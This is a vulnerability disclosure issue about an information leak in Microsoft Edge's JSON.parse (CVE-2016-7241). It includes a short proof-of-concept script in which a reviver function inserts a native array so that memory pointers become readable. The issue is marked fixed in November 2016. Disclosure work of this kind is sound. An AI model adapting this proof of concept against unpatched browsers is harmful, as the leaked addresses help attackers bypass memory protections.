New issue
Advanced search Search tips

Issue 952 link

Starred by 1 user

Issue metadata

Status: Fixed
Closed: Nov 2016

Sign in to add a comment

Microsoft Edge: Info Leak in JSON.parse

Project Member Reported by, Sep 22 2016

Issue description

There is an info leak in JSON.parse. If this function is called with a reviver, and the reviver modifies the output object to contain a native array, the Walk function assumes that this array is a Var array, and writes pointers to it. These pointers can then be read out of the array by script.

A minimal PoC is as follows:

var once = false;
var a = 1;

function f(){
		a = new Array(1, 2, 3);
		this[2] = a;
        once = true;
	return {};


JSON.parse("[1, 2, [4, 5]]", f);

A full PoC is attached. When loaded in a browser, this PoC will delay pointers in an alert dialog.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

558 bytes View Download
Project Member

Comment 1 by, Nov 10 2016

Labels: CVE-2016-7241
Status: Fixed (was: New)
Project Member

Comment 2 by, Dec 1 2016

Labels: -Restrict-View-Commit

Comment 3 Deleted

Sign in to add a comment